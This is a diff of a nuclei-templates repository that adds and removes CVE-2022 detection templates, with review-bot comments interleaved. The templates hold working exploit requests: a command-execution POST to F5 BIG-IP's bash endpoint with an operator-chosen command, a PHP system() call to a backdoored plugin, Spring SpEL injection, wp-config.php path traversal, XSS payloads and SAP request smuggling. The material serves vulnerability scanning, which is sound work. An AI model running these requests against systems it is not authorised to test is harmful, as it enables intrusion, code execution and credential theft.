similarity index 100%
rename from nuclei-templates/CVE-2022/cve-2022-0692.yaml
rename to nuclei-templates/CVE-2022/CVE-2022-0692.yaml
diff --git a/nuclei-templates/CVE-2022/CVE-2022-0776.yaml b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml
new file mode 100644
index 0000000000..153fbe5e2b
--- /dev/null
+++ b/nuclei-templates/CVE-2022/CVE-2022-0776.yaml
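Review bot: The body matcher is shown as the single word `'here'`, which occurs on almost any HTML page, so a 200 text/html response from fallback-page.php is reported whether or not `site_url` was reflected unescaped. If markup around that word was lost when this page was rendered, the matcher should still include the reflected `javascript:alert(document.domain)` value so that a match proves the parameter reached the link. The first reference, `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653`, lacks the `CVE-` prefix that sibling templates use in that URL (`name=CVE-2022-0653`). `classification` has no `cvss-metrics`, `cvss-score` or `cwe-id`, and the description ends in a stray `\n\n.`.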
@@ -0,0 +1,31 @@ +id: CVE-2022-0776 +info: + name: RevealJS postMessage XSS + author: LogicalHunter + severity: medium + description: Cross-site Scripting (XSS) - DOM in GitHub repository hakimel/reveal.js prior to 4.3.0. + reference: + - https://hackerone.com/reports/691977 + - https://github.com/hakimel/reveal.js/pull/3137 + - https://huntr.dev/bounties/be2b7ee4-f487-42e1-874a-6bcc410e4001/ + classification: + cve-id: CVE-2022-0776 + tags: cve,cve2022,headless,postmessage,revealjs +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: waitload + - action: script + name: extract + args: + code: | + () => { + return (Reveal.VERSION <= "3.8.0" || Reveal.VERSION < "4.3.0") + } + matchers: + - type: word + part: extract + words: + - "true" diff --git a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml b/nuclei-templates/CVE-2022/CVE-2022-0870.yaml deleted file mode 100644 index b1aa655570..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0870.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2022-0870 -info: - name: Gogs - SSRF - author: Akincibor - severity: medium - description: Server-Side Request Forgery (SSRF) in Gogs prior to 0.12.5. - reference: - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-0870 - - https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb - - https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2022-0870 - cwe-id: CWE-918 - metadata: - shodan-query: http.favicon.hash:-449283196 - tags: cve,cve2022,ssrf,gogs -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '
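Review bot: The version test in the `script` step compares `Reveal.VERSION` as a string, so the ordering is lexicographic: a release such as `4.10.0` or `10.0.0` sorts below `"4.3.0"` and would be reported as vulnerable. The `<= "3.8.0"` clause is already implied by the second comparison. Compare the numeric parts instead, for example `const [maj, min] = Reveal.VERSION.split('.').map(Number);` followed by `return maj < 4 || (maj === 4 && min < 3);`. The script also errors when the page does not define `Reveal`; a `typeof Reveal !== 'undefined'` guard would turn non-reveal.js targets into a clean non-match.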
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: regex - group: 1 - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - '
\n\s+© \d{4} Gogs Version: ([\d.]+) Page:' - - type: dsl - dsl: - - compare_versions(version, '< 0.12.5') - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1040.yaml b/nuclei-templates/CVE-2022/CVE-2022-1040.yaml new file mode 100644 index 0000000000..5d4bea1f07 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1040.yaml @@ -0,0 +1,42 @@ +id: CVE-2022-1040 +info: + name: Sophos Firewall <=18.5 MR3 - Remote Code Execution + author: For3stCo1d + severity: critical + description: | + Sophos Firewall version v18.5 MR3 and older contains an authentication bypass vulnerability in the User Portal and Webadmin which could allow a remote attacker to execute code. + reference: + - https://github.com/killvxk/CVE-2022-1040 + - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker + - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 + - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1040 + cwe-id: CWE-287 + metadata: + verified: true + shodan-query: http.title:"Sophos" + tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev +requests: + - method: POST + path: + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\U0001F99E\":\"test\"}" + headers: + X-Requested-With: "XMLHttpRequest" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{\"status\":\"Session Expired\"}" + - type: word + part: header + words: + - "Server: xxxx" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/19 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1119.yaml b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml new file mode 100644 index 0000000000..9f39aee98b --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1119.yaml 
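Review bot: Nothing in the CVE-2022-1040 template explains why its three matchers indicate an unpatched device. The request is a single unauthenticated POST with a non-ASCII JSON key, and a hit is declared on `{"status":"Session Expired"}`, `Server: xxxx` and status 200, while the name and tags advertise `rce`. A comment above `matchers:` would help whoever triages a hit, for example `# Indicator only: no command is executed; a match presumably means the parser accepted the non-ASCII key - confirm against the Sophos advisory`. The `Server: xxxx` word is matched case-sensitively as written, so a front end that lowercases header names could hide an affected host; `case-insensitive: true` on that matcher avoids it.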
@@ -0,0 +1,35 @@ +id: CVE-2022-1119 +info: + name: WordPress Simple File List <3.2.8 - Local File Inclusion + author: random-robbie + severity: high + description: | + WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + reference: + - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e + - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 + - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1119 + cwe-id: CWE-22 + tags: cve,cve2022,lfi,wordpress,wp,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml b/nuclei-templates/CVE-2022/CVE-2022-1221.yaml deleted file mode 100644 index ca0ab04ccb..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1221.yaml +++ /dev/null 
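Review bot: A positive result from this request is the target's `wp-config.php`, so the response that proves the finding contains the site's live database credentials. Anything that persists responses (stored responses, debug logs, report attachments) then holds those secrets, and the template does not say so. Add a comment above `requests:`, for example `# A match returns wp-config.php: treat stored responses as secrets and rotate the DB credentials on confirmed hosts`.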
@@ -1,37 +0,0 @@ -id: CVE-2022-1221 -info: - name: Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting - author: veshraj - severity: medium - description: | - The Gwyn's Imagemap Selector Wordpresss plugin does not sanitize the id and class parameters before returning them back in attributes, leading to a Reflected Cross-Site Scripting. - reference: - - https://wpscan.com/vulnerability/641be9f6-2f74-4386-b16e-4b9488f0d2a9 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1221 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1221 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: xss,wordpress,wp-plugin,wp,cve,cve2022 -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - '{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - " popup-" - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1388.yaml b/nuclei-templates/CVE-2022/CVE-2022-1388.yaml new file mode 100644 index 0000000000..62a06938bc --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1388.yaml 
@@ -0,0 +1,57 @@ +id: CVE-2022-1388 +info: + name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter + author: Mrcl0wn + severity: critical + description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" + reference: + - https://github.com/alt3kx/CVE-2022-1388_PoC + - https://support.f5.com/csp/article/K23605346 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 + - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md + - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py + - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip + - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-1388 + cwe-id: CWE-306 + metadata: + shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" + verified: true + tags: bigip,mirai,rce,cve,cve2022 +variables: + auth_var: "admin:" + cmd_var: "{{CMD}}" +requests: + - raw: + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: {{Hostname}} + Connection: keep-alive, X-F5-Auth-Token + X-F5-Auth-Token: a + Authorization: Basic {{base64(auth_var)}} + Content-Type: application/json + + { + "command": "run", + "utilCmdArgs": "-c 'id;cmd_var'" + } + extractors: + - type: regex + part: body + name: result_command + group: 1 + regex: + - "\"commandResult\":\"(.*)\"" + matchers: + - type: word + words: + - "commandResult" + - "uid=" + - "{{cmd_var}}" + - 
type: status + status: + - 200 + condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-1392.yaml b/nuclei-templates/CVE-2022/CVE-2022-1392.yaml deleted file mode 100644 index 1cfaf712bd..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1392.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2022-1392 -info: - name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion - author: Veshraj - severity: high - description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. - reference: - - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 - - https://packetstormsecurity.com/files/166534/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-1392 - metadata: - verified: true - tags: cve,cve2022,lfi,wp-plugin,wp,wordpress,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "failed to open stream: No such file or directory" - - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1609.yaml b/nuclei-templates/CVE-2022/CVE-2022-1609.yaml new file mode 100644 index 0000000000..70e48868d8 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1609.yaml 
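Review bot: The `matchers` list of the CVE-2022-1388 template has no `matchers-condition: and`, so the word matcher and the status matcher are alternatives and any endpoint that answers 200 is reported as vulnerable. The trailing `condition: and` appears to sit on the status matcher (indentation is lost in this rendering), where it has no effect. The word list also includes `{{cmd_var}}`, which is fed from a caller-supplied `{{CMD}}`; a detection template should not carry an operator-chosen command to a management interface. Keep only the fixed probe, `"utilCmdArgs": "-c 'id'"`, and drop the `cmd_var` variable. Then match `commandResult` and `uid=` with `condition: and` on the word matcher, under `matchers-condition: and`.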
@@ -0,0 +1,35 @@ +id: CVE-2022-1609 +info: + name: The School Management < 9.9.7 - Remote Code Execution + author: For3stCo1d + severity: critical + description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. + reference: + - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609 + metadata: + verified: false + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2022-1609 + cwe-id: CWE-77 + tags: cve,cve2022,wordpress,rce,wp,backdoor +variables: + cmd: "echo CVE-2022-1609 | rev" +requests: + - raw: + - | + POST /wp-json/am-member/license HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + blowfish=1&blowf=system('{{cmd}}'); + matchers-condition: and + matchers: + - type: word + part: body + words: + - '9061-2202-EVC' + +# Enhanced by mp on 2022/05/27 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1904.yaml b/nuclei-templates/CVE-2022/CVE-2022-1904.yaml deleted file mode 100644 index 44550af381..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1904.yaml +++ /dev/null 
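Review bot: The `info` block has no `remediation` field, and for this template that matters more than usual. Per the description, a match means backdoored plugin code answered the request, so the host should be handled as potentially compromised rather than merely outdated. Suggest `remediation: Update the plugin to 9.9.7 or later and review the site for signs of prior unauthorized access.` The marker check also depends on a `rev` binary being present on the target, so a host without it would presumably be missed. `verified: false` in `metadata` suggests the template has not been confirmed against a live install.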
@@ -1,35 +0,0 @@ -id: CVE-2022-1904 -info: - name: Easy Pricing Tables < 3.2.1 - Reflected Cross-Site-Scripting - author: Akincibor - severity: medium - description: | - The plugin does not sanitize and escape parameter before reflecting it back in a page available to any user (both authenticated and unauthenticated) when a specific setting is enabled, leading to a reflected cross-site scripting. - reference: - - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1904 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1904 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,wp-plugin,xss,wp,wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' - matchers-condition: and - matchers: - - type: word - part: body - words: - - ' - Color' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-1906.yaml b/nuclei-templates/CVE-2022/CVE-2022-1906.yaml deleted file mode 100644 index 0de7988bdc..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-1906.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2022-1906 -info: - name: Copyright Proof <= 4.16 - Reflected Cross-Site-Scripting - author: random-robbie - severity: medium - description: | - The plugin does not sanitise and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting when a specific setting is enabled. - reference: - - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1906 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1906 - cwe-id: CWE-79 - metadata: - google-dork: inurl:/wp-content/plugins/digiproveblog - verified: "true" - tags: cve,cve2022,wordpress,xss,wp-plugin,wp -requests: - - raw: - - | - GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and - matchers: - - type: word - part: body - words: - - "got message " - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21500.yaml b/nuclei-templates/CVE-2022/CVE-2022-21500.yaml new file mode 100644 index 0000000000..bfd9bb4211 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21500.yaml 
@@ -0,0 +1,37 @@ +id: CVE-2022-21500 +info: + name: Oracle E-Business Suite <=12.2 - Authentication Bypass + author: 3th1c_yuk1,tess + severity: high + description: | + Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + reference: + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21500 + metadata: + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + verified: "true" + tags: cve,cve2022,oracle,misconfig,auth-bypass +requests: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + matchers-condition: and + matchers: + - type: word + words: + - 'Registration' + - 'Register as individual' + - '' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2187.yaml b/nuclei-templates/CVE-2022/CVE-2022-2187.yaml deleted file mode 100644 index 26f13b2649..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2187.yaml +++ /dev/null 
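Review bot: The word matcher under `matchers:` rests on two generic strings, `Registration` and `Register as individual`, and its third entry is shown as an empty string `''`. If the empty entry is really in the file (it may be markup lost in this rendering), it matches every response and adds nothing under `condition: and`; it should be a string specific to `ibeCAcpSSOReg.jsp`. The check also shows only that the self-registration page is served with status 200, not that registration is accepted. A comment such as `# Indicates the registration page is exposed; confirm the patch level before reporting as CVE-2022-21500` would set expectations for triage.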
@@ -1,36 +0,0 @@ -id: CVE-2022-2187 -info: - name: Contact Form 7 Captcha < 0.1.2 - Reflected Cross-Site Scripting - author: For3stCo1d - severity: medium - description: | - The Contact Form 7 Captcha WordPress plugin before 0.1.2 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers - reference: - - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d - - https://wordpress.org/plugins/contact-form-7-simple-recaptcha - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2187 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-2187 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,xss,wp-plugin,wp -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&">' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Contact Form 7" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22536.yaml b/nuclei-templates/CVE-2022/CVE-2022-22536.yaml deleted file mode 100644 index 6afb76b607..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22536.yaml +++ /dev/null 
@@ -1,63 +0,0 @@ -id: CVE-2022-22536 - -info: - name: SAP Memory Pipes (MPI) Desynchronization - author: pdteam - severity: critical - description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-22536 - - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022 - - https://github.com/Onapsis/onapsis_icmad_scanner - - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2022-22536 - cwe-id: CWE-444 - metadata: - shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev - -requests: - - raw: - - |+ - GET {{sap_path}} HTTP/1.1 - Host: {{Hostname}} - Content-Length: 82646 - Connection: keep-alive - - {{repeat("A", 82642)}} - - GET / HTTP/1.1 - Host: {{Hostname}} - - payloads: - sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner - - /sap/admin/public/default.html - - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png - - unsafe: true - read-all: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: dsl - dsl: - - "contains(tolower(body), 'administration')" # confirms 1st path - - "contains(tolower(all_headers), 'content-type: image/png')" # confirms 2nd path - condition: 
or - - - type: word - part: body - words: - - "HTTP/1.0 400 Bad Request" # error in concatenated response - - "HTTP/1.0 500 Internal Server Error" - - "HTTP/1.0 500 Dispatching Error" - condition: or - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-22954.yaml b/nuclei-templates/CVE-2022/CVE-2022-22954.yaml similarity index 100% rename from nuclei-templates/CVE-2022/cve-2022-22954.yaml rename to nuclei-templates/CVE-2022/CVE-2022-22954.yaml diff --git a/nuclei-templates/CVE-2022/CVE-2022-22963.yaml b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml new file mode 100644 index 0000000000..f28360d6a7 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml 
@@ -0,0 +1,44 @@ +id: CVE-2022-22963 + +info: + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt + severity: critical + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 + +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml b/nuclei-templates/CVE-2022/CVE-2022-22972.yaml deleted file mode 100644 index f0934ac0fe..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22972.yaml +++ /dev/null 
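Review bot: The two matchers, status 500 and the body word `functionRouter`, will fire on many unaffected servers, because `functionRouter` is part of every requested path and generic error pages commonly echo the path. The match needs a signal that does not come from the request itself. Until it has one, a comment such as `# Weak signal: 500 plus echoed path; confirm manually before reporting` should sit above `matchers:`. The metadata also needs attention: there is no `reference` list, and `cwe-id: CWE-770` (resource allocation) does not fit the expression-injection issue the description names, so it should be checked against NVD. The last path, `{{RootURL}}%2fadmin%2functionRouter`, is missing an `f` and decodes to `/admin/unctionRouter`.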
@@ -1,93 +0,0 @@ -id: CVE-2022-22972 -info: - name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass - author: For3stCo1d,princechaddha - severity: critical - description: | - VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. - reference: - - https://github.com/horizon3ai/CVE-2022-22972 - - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive - - https://www.vmware.com/security/advisories/VMSA-2022-0014.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22972 - cwe-id: CWE-287 - metadata: - fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" - tags: cve,cve2022,vmware,auth-bypass,oast -requests: - - raw: - - | - GET /vcac/ HTTP/1.1 - Host: {{Hostname}} - - | - GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 - Host: {{Hostname}} - - | - POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 - Host: {{interactsh-url}} - Content-type: application/x-www-form-urlencoded - - protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in - redirects: true - max-redirects: 3 - cookie-reuse: true - extractors: - - type: regex - part: body - name: protected_state - group: 1 - regex: - - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' - internal: true - - type: regex - part: body - name: horizonRelayState - group: 1 - regex: - - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' - internal: true - - type: regex - part: body 
- name: userstore - group: 1 - regex: - - 'id="userstore" value="([a-z.]+)" \/>' - internal: true - - type: regex - part: body - name: userstoreDisplay - group: 1 - regex: - - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' - internal: true - - type: regex - part: body - name: stickyConnectorId - group: 1 - regex: - - 'name="stickyConnectorId" value="(.*)"/>' - internal: true - - type: kval - part: header - name: HZN-Cookie - kval: - - 'HZN' - matchers-condition: and - matchers: - - type: word - part: header - words: - - "HZN=" - - type: status - status: - - 302 - - type: word - part: interactsh_protocol - words: - - "http" - -# Enhanced by mp on 2022/06/01 diff --git a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml b/nuclei-templates/CVE-2022/CVE-2022-23131.yaml deleted file mode 100644 index 40b9b42d62..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-23131.yaml +++ /dev/null 
@@ -1,44 +0,0 @@ -id: CVE-2022-23131 - -info: - name: Zabbix - SAML SSO Authentication Bypass - author: For3stCo1d,spac3wh1te - severity: critical - description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified. - reference: - - https://support.zabbix.com/browse/ZBX-20350 - - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://github.com/1mxml/CVE-2022-23131 - remediation: Upgrade to 5.4.9rc2, 6.0.0beta1, 6.0 (plan) or higher. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - metadata: - fofa-query: app="ZABBIX-监控系统" && body="saml" - shodan-query: http.favicon.hash:892542951 - tags: cve,cve2022,zabbix,auth-bypass,saml,sso,kev - -requests: - - method: GET - path: - - "{{BaseURL}}/zabbix/index_sso.php" - - "{{BaseURL}}/index_sso.php" - - headers: - 